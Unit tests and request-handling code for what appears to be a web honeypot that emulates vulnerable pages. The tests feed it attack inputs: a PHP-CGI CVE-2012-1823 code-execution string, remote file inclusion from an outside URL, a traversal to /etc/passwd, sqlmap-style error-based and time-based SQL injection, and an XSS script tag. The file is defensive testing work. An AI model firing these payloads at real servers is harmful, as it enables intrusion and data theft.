def test_unknown_emulator(self):
"""Objective: Emulator testing for non-malicious requests.
Input: http://localhost:8080/
Expected Result: One of the generated attack surfaces.
Notes:"""
#Write dummy file
tmp_file = 'modules/handlers/emulators/dork_list/pages/{0}'.format(str(uuid.uuid4()))
try:
with open(tmp_file, 'w+') as f:
f.write("tmpfile")
print "Starting 'unknown' request emulation module"
self.event.parsed_request = util.HTTPRequest()
self.event.parsed_request.url = "/"
self.event.matched_pattern = "unknown"
self.event.response = ""
self.event.source_addr = ("127.0.0.1", "8080")
emulator = request_handler.get_handler(self.event.matched_pattern)
print "Sending request:", "http://localhost:8080/"
emulator.handle(self.event)
remote_hash = hashlib.md5(self.event.response).hexdigest()
local_hash = hashlib.md5(emulator.template).hexdigest()
print "Hash of the local 'response' file:", local_hash
self.assertEqual(remote_hash, local_hash)
print "Return value:", remote_hash
print "matched a generated attack surface item."
finally:
if os.path.isfile(tmp_file):
os.remove(tmp_file)
def handle_request(self, raw_request, addr, connection):
attack_event = attack.AttackEvent()
attack_event.sensor_addr = connection.sock.getsockname()
attack_event.raw_request = raw_request
# Parse the request
attack_event.parsed_request = self.HTTP_parser.parse_request(raw_request)
if self.options["proxy_enabled"] == "True":
self._handle_proxy(attack_event)
else:
attack_event.source_addr = addr
self.print_info(attack_event)
# Handle the HTTP request method
attack_event.matched_pattern = getattr(
self.MethodHandlers,
attack_event.parsed_request.method,
self.MethodHandlers.GET
)(attack_event.parsed_request)
# Handle the request with the specific vulnerability module
emulator = request_handler.get_handler(attack_event.matched_pattern)
emulator.handle(attack_event)
# Logging the event
if not self.test:
self.profiler.handle_event(attack_event)
self.post_queue.put(attack_event)
response_util = util.HTTPServerResponse()
attack_event.response = response_util.get_header(attack_event) + attack_event.response
return attack_event.response
def test_phpinfo_emulator(self):
"""Objective: Emulator testing for phpinfo.php requests
Input: http://localhost/phpinfo.php
Expected Result: Result of the phpinfo() function
Notes:"""
self.event.parsed_request = util.HTTPRequest()
self.event.parsed_request.method = 'GET'
self.event.parsed_request.url = "/info.php?param1"
self.event.matched_pattern = "phpinfo"
emulator = request_handler.get_handler(self.event.matched_pattern)
emulator.handle(self.event)
self.assertTrue("PHP Version " in self.event.response)
self.assertTrue("Zend Extension" in self.event.response)
def test_dummy_emulator(self):
"""Objective: Tests the dummy emulator added to prove extensibility.
Input: http://localhost:8080/
Expected Results: Returns a short message for verification.
Notes: The dummy emulator fulfills minimal emulator requirements."""
print "Starting Dummy emulator module test"
self.event.matched_pattern = "dummy"
print "Loading module"
emulator = request_handler.get_handler(self.event.matched_pattern)
print "Trying to handle an event with the dummy module"
emulator.handle(self.event)
self.assertEqual(self.event.response, "dummy response")
print "Return value: '" + self.event.response + "'",
print "equates our expectation."
def test_phpcgi_source_code_disclosure_emulator(self):
"""Objective: Emulator testing for PHP CGI source code disclosure CVE-2012-1823
Input: http://localhost:8080/index.php?-s
Expected Result: Source code disclosure
Notes:"""
self.event.parsed_request = util.HTTPRequest()
self.event.parsed_request.url = "/index.php"
self.event.parsed_request.parameters = "-s"
self.event.matched_pattern = "php_cgi_rce"
self.event.response = ""
emulator = request_handler.get_handler(self.event.matched_pattern)
emulator.handle(self.event)
self.assertEquals(self.event.response, """<code><span style="color: #000000">
<span style="color: #0000BB"><?php<br />page </span><span style="color: #007700">= </span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'page'</span><span style="color: #007700">];<br />include(</span><span style="color: #0000BB">page</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">?><br /></span>
</span>""")
def test_phpcgi_rce_emulator(self):
"""Objective: Emulator testing for PHP CGI remote code execution CVE-2012-1823
Input: http://localhost/-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input POST: <?php echo("rce attempt"); ?>
Expected Result: Remote command execution of a echo command
Notes:"""
self.event.parsed_request = util.HTTPRequest()
self.event.parsed_request.method = 'POST'
self.event.parsed_request.url = "/index.php"
self.event.parsed_request.parameters = "-d+allow_url_include=on+-d+safe_mode=off+-d+open_basedir=off-d+auto_prepend_file=php://input"
self.event.matched_pattern = "php_cgi_rce"
self.event.parsed_request.body = '<?php echo "testing"; ?>'
emulator = request_handler.get_handler(self.event.matched_pattern)
emulator.handle(self.event)
print "Return value:", self.event.response
self.assertTrue("""testing""" == self.event.response)
def test_sqli_emulator(self):
"""Objective: Assure that the SQL injection module is integrated.
Input: Inject 'SELECT a FROM b' in parameter q.
Expected Results: MySQL error message.
Notes: As there is no table b, the honeypot returns an error message."""
print "Starting SQL injection module integration test..."
self.event.matched_pattern = "sqli"
emulator = request_handler.get_handler(self.event.matched_pattern)
self._get_test_request(self.event)
print "Sending request:", self.test_request
emulator.handle(self.event)
#print self.event.response
response = "Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT A FROM B' at line 1"
self.assertEqual(self.event.response, response)
print "Return value: Invalid query: You have an error in your SQL syntax; (truncated)",
print "equates our expectation."
def test_rfi_emulator(self):
# TODO: Handle return value from sandbox
"""Objective: Remote File Injection test.
Input: http://localhost:8080/test.php?p=http://google.com/index.html
Expected Result: The return value from the PHP sandbox.
Notes: Injected file contains <?php echo("test successful"); ?>"""
print "Starting remote file inclusion test"
self.event.parsed_request = util.HTTPRequest()
self.event.parsed_request.url = "/test.php?p=http://1durch0.de/test_file.txt"
print "Sending request:", "http://localhost:8080" + self.event.parsed_request.url
self.event.matched_pattern = "rfi"
self.event.response = ""
emulator = request_handler.get_handler(self.event.matched_pattern)
emulator.handle(self.event)
self.assertEqual(self.event.response, "test successful")
print "Return value 'test successful', matching our expectation."
def test_sqli_parser(self):
"""Objective: Tests the SQL injection parser.
Input: 'SELECT A FROM B'
Expected Results: Parsed tokens (SELECT (SELECT_CORE (COLUMNS (ALIAS (COLUMN_EXPRESSION A))) (FROM (ALIAS B))))
Notes: The Parser turns the tokens into a query"""
print "Starting SQL injection Parser test..."
self.event.matched_pattern = "sqli"
emulator = request_handler.get_handler(self.event.matched_pattern)
self._get_test_request(self.event)
print "Sending request:", self.test_request
emulator.handle(self.event)
self.assertEqual(emulator.query_parser.tree,
'(SELECT (SELECT_CORE (COLUMNS (ALIAS (COLUMN_EXPRESSION A))) (FROM (ALIAS B))))')
print "Return value: Parsed tokens:",
print '(SELECT (SELECT_CORE (COLUMNS (ALIAS (COLUMN_EXPRESSION A))) (FROM (ALIAS B))))',
print "equates our expectation."
def test_sqli_lexer(self):
"""Objective: Tests the SQL injection lexer.
Input: 'SELECT A FROM B'
Expected Results: Query tokens 121, 237, 80, 237, 122, 237, 80
Notes: 121 matches the SELECT, 237 the three white spaces, 80 the column and table alias and 122 the FROM"""
print "Starting SQL injection Lexer test..."
self.event.matched_pattern = "sqli"
emulator = request_handler.get_handler(self.event.matched_pattern)
self._get_test_request(self.event)
print "Sending request:", self.test_request
emulator.handle(self.event)
#print self.event.response
self.assertEqual(emulator.query_parser.tokens,
[121, 237, 80, 237, 122, 237, 80])
print "Return value: Query tokens:",
print "'" + ', '.join([str(t) for t in emulator.query_parser.tokens]) + "'",
print "equates our expectation."
def test_pma_emulator(self):
"""Objective: Testing an emulator for PHPMyAdmin specific attacks.
Input: http://localhost:8080/phpmyadmin
Expected Result: The PHPMyAdmin set-up page.
Notes: This module is for a specific attack against PHPMyAdmin"""
with open('modules/handlers/emulators/phpmyadmin/script_setup.php', 'r') as setup_php:
page = setup_php.read()
local_hash = hashlib.md5(page).hexdigest()
print "Hash of the local 'script' file:", local_hash
self.event.matched_pattern = "phpmyadmin"
self.event.response = ""
emulator = request_handler.get_handler(self.event.matched_pattern)
print "Sending request:", "http://localhost:8080/phpmyadmin/setup.php"
emulator.handle(self.event)
remote_hash = hashlib.md5(emulator.page).hexdigest()
self.assertEqual(remote_hash, local_hash)
print "Return value:", remote_hash
print "matched the hash of the local file."
def test_sqli_xss(self):
"""Objective: Injecting JavaScript.
Input: '<script>alert("XSS");</script>'
Expected Results: MySQL syntax error message containing '<script>alert("XSS");</script>'
Notes: The query and identifying string is included in the error message."""
print "Starting error based JavaScript injection test"
self.event.matched_pattern = "sqli"
emulator = request_handler.get_handler(self.event.matched_pattern)
self.event.parsed_request.parameters_dict = {
'q': '<script>alert("XSS");</script>',
}
self._get_test_request(self.event)
print "Sending request:", self.test_request
emulator.handle(self.event)
#print self.event.response
self.assertTrue('<script>alert("XSS");</script>' in self.event.response)
print "Return value: ", self.event.response,
print "equates our expectation."
def test_error_based_concatenated(self):
"""Objective: Complex error based vulnerability probing request containing CONCAT.
Input: ') AND (SELECT 8957 FROM(SELECT COUNT(*),CONCAT(0x3a6e676a3a,(SELECT (CASE WHEN (8957=8957) THEN 1 ELSE 0 END)),0x3a6f74633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (4673=4673'
Expected Results: MySQL syntax error message containing ':ngj:1:otc:0' (the result from the CONCAT call)
Notes: The query and identifying string is included in the error message."""
print "Starting error based SQLMap injection test"
self.event.matched_pattern = "sqli"
emulator = request_handler.get_handler(self.event.matched_pattern)
self.event.parsed_request.parameters_dict = {
"q": ") AND (SELECT 8957 FROM(SELECT COUNT(*),CONCAT(0x3a6e676a3a,(SELECT (CASE WHEN (8957=8957) THEN 1 ELSE 0 END)),0x3a6f74633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (4673=4673",
}
self._get_test_request(self.event)
print "Sending request:", self.test_request
emulator.handle(self.event)
#print self.event.response
self.assertTrue(':ngj:1:otc:0' in self.event.response)
print "Return value: ", self.event.response,
print "equates our expectation."
def test_robots_emulator(self):
"""Objective: Test the robots.txt emulator.
Input: http://localhost:8080/robots.txt
Expected Response: The robots.txt page.
Notes: The robots.txt is provided by the honeypot"""
print "Starting robot.txt request handling module"
with open('modules/handlers/emulators/robots/robots.txt', 'r') as robots_file:
robots = robots_file.read()
local_hash = hashlib.md5(robots).hexdigest()
print "Hash of the local 'robots' file:", local_hash
self.event.matched_pattern = "robots"
emulator = request_handler.get_handler(self.event.matched_pattern)
print "Sending request:", "http://localhost:8080/robots.txt"
emulator.handle(self.event)
remote_hash = hashlib.md5(self.event.response).hexdigest()
self.assertEqual(remote_hash, local_hash)
print "Return value:", remote_hash
print "matched content of robots.txt."
def test_style_css_emulator(self):
"""Objective: Test the style.css emulator.
Input: http://localhost:8080/styles.css
Expected Result: The styles.css file.
Notes: Definitions used for the attacks surface style parameters."""
print "Starting style.css emulator test"
with open('modules/handlers/emulators/style/style.css', 'r') as style_file:
style = style_file.read()
local_hash = hashlib.md5(style).hexdigest()
print "Hash of the local 'style' file:", local_hash
self.event.matched_pattern = "style_css"
emulator = request_handler.get_handler(self.event.matched_pattern)
print "Sending request:", "http://localhost:8080/style.css"
emulator.handle(self.event)
remote_hash = hashlib.md5(self.event.response).hexdigest()
self.assertEqual(remote_hash, local_hash)
print "Return value:", remote_hash
print "matched content of style.css."
def test_sqli_mysqld_version(self):
"""Objective: A query with the goal to disclose the MySQL server version.
Input: SELECT @@version.
Expected Results: The MySQL server version number.
Notes: The query is MySQL specific."""
print "Starting mysqld version disclosure test"
self.event.matched_pattern = "sqli"
emulator = request_handler.get_handler(self.event.matched_pattern)
self.event.parsed_request.parameters_dict = {
"q": "SELECT @@version",
}
self._get_test_request(self.event)
print "Sending request:", self.test_request
emulator.handle(self.event)
#print self.event.response
response = "5.1.49-3"
self.assertEqual(self.event.response.strip(), response)
print "Return value: ", response,
print "equates our expectation."
def test_sqli_select_user(self):
"""Objective: A query with the goal to disclosure the current user.
Input: SELECT user().
Expected Results: Current SQL user name.
Notes: This query is MySQL specific."""
print "Starting SQL user disclosure test"
self.event.matched_pattern = "sqli"
emulator = request_handler.get_handler(self.event.matched_pattern)
self.event.parsed_request.parameters_dict = {
"q": "SELECT user()",
}
self._get_test_request(self.event)
print "Sending request:", self.test_request
emulator.handle(self.event)
#print self.event.response
response = "root@localhost"
self.assertEqual(self.event.response.strip(), response)
print "Return value: ", response,
print "equates our expectation."
def test_sqli_error_based(self):
"""Objective: A simple query provoking an error message from the database.
Input: Inject a single quotation mark in parameter q.
Expected Results: MySQL syntax error message.
Notes: The query is included in the error message."""
print "Starting error based SQL injection test"
self.event.matched_pattern = "sqli"
emulator = request_handler.get_handler(self.event.matched_pattern)
self.event.parsed_request.parameters_dict = {
"q": "'",
}
self._get_test_request(self.event)
print "Sending request:", self.test_request
emulator.handle(self.event)
#print self.event.response
response = "Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1"
self.assertEqual(self.event.response, response)
print "Return value: ", response,
print "equates our expectation."
def test_unknown_emulator(self):
"""Objective: Emulator testing for non-malicious requests.
Input: http://localhost:8080/
Expected Result: One of the generated attack surfaces.
Notes:"""
print "Starting 'unknown' request emulation module"
self.event.parsed_request = util.HTTPRequest()
self.event.parsed_request.url = "/"
self.event.matched_pattern = "unknown"
self.event.response = ""
self.event.source_addr = ("127.0.0.1", "8080")
emulator = request_handler.get_handler(self.event.matched_pattern)
print "Sending request:", "http://localhost:8080/"
emulator.handle(self.event)
remote_hash = hashlib.md5(self.event.response).hexdigest()
local_hash = hashlib.md5(emulator.template).hexdigest()
print "Hash of the local 'response' file:", local_hash
self.assertEqual(remote_hash, local_hash)
print "Return value:", remote_hash
print "matched a generated attack surface item."
def test_favicon_emulator(self):
# TODO: Handle existing favicon
"""Objective: Test the favicon.ico handling module.
Input: http://localhost:8080/favicon.ico
Expected Result: Returns a favicon for the browser if available.
Notes: Providing a unique favicon could improve the deception."""
print "Starting favicon module test"
self.event.matched_pattern = "favicon_ico"
emulator = request_handler.get_handler(self.event.matched_pattern)
print "Sending request to the module: http://localhost:8080/favicon.ico"
self.event.parsed_request.url = "/favicon.ico"
emulator.handle(self.event)
with open("modules/handlers/emulators/favicon/favicon.ico", "r") as favicon:
data = favicon.read()
local_hash = hashlib.md5(data).hexdigest()
print "Calculate md5 hash from local favicon file:", local_hash
remote_hash = hashlib.md5(self.event.response.split("\r\n\r\n")[1]).hexdigest()
self.assertEqual(remote_hash, local_hash)
print "Return value", remote_hash,
print "matched expectation."
def handle_request(self, raw_request, addr, connection):
response_code = "200 OK"
attack_event = attack.AttackEvent()
attack_event.sensor_addr = connection.sock.getsockname()
attack_event.raw_request = raw_request
# Parse the request
try:
attack_event.parsed_request = self.HTTP_parser.parse_request(
raw_request)
except util.ParsingError as e:
response_code = e.response_code
else:
if self.options["proxy_enabled"] == "True":
self._handle_proxy(attack_event)
else:
attack_event.source_addr = addr
logger.info("{0} requested {1} {2} on {3}".format(
attack_event.source_addr[0],
attack_event.parsed_request.method,
attack_event.parsed_request.url,
attack_event.parsed_request.header.get('Host', "None")
)
)
# Handle the HTTP request method
attack_event.matched_pattern = getattr(
self.MethodHandlers,
attack_event.parsed_request.method,
self.MethodHandlers.GET
)(attack_event.parsed_request)
# Handle the request with the specific vulnerability module
emulator = request_handler.get_handler(attack_event.matched_pattern)
emulator.handle(attack_event)
# Logging the event
if not self.test:
if self.profiler_available:
self.profiler.handle_event(attack_event)
self.post_queue.put(attack_event)
response_code = "200 OK"
response_util = util.HTTPServerResponse(response_code)
attack_event.response = response_util.get_header(attack_event) + attack_event.response
return attack_event.response
def test_obfuscated_blind_sqli(self):
"""Objective: Injecting an obfuscated response delaying SQL query.
Input: ')%20aND%20SLeeP(1)%20And%20(4673%3D4673'
Expected Results: Response is delayed by 1 second
Notes: """
print "Starting obfuscated time based injection test"
self.event.matched_pattern = "sqli"
emulator = request_handler.get_handler(self.event.matched_pattern)
self.event.parsed_request.parameters_dict = {
"q": ")%20aND%20SLeeP(1)%20And%20(4673%3D4673",
}
self._get_test_request(self.event)
print "Noting time and sending request:", self.test_request
start = datetime.datetime.now()
emulator.handle(self.event)
#print self.event.response
end = datetime.datetime.now()
duration = end - start
self.assertTrue(duration.seconds >= 1)
print "Response duration: ", duration,
print "equates our expectation."
def test_lfi_emulator(self):
"""Objective: Local File Inclusion module testing.
Input: http://localhost:8080/test.php?p=../../../../../etc/passwd
Expected Result: The passwd file from the virtual file system.
Notes:"""
print "Starting local file inclusion test"
with open("virtualdocs/linux/etc/passwd", 'r') as passwd_file:
passwd = passwd_file.read()
local_hash = hashlib.md5(passwd).hexdigest()
print "Hash of the local 'passwd' file:", local_hash
self.event.parsed_request = util.HTTPRequest()
self.event.parsed_request.url = "/test.php?p=../../../../../etc/passwd"
print "Sending request:", "http://localhost:8080" + self.event.parsed_request.url
self.event.matched_pattern = "lfi"
self.event.response = ""
print "Loading the emulator and handling the request."
emulator = request_handler.get_handler(self.event.matched_pattern)
emulator.handle(self.event)
remote_hash = hashlib.md5(self.event.response).hexdigest()
self.assertEqual(remote_hash, local_hash)
print "Return value:", remote_hash
print "matched the hash of the local file."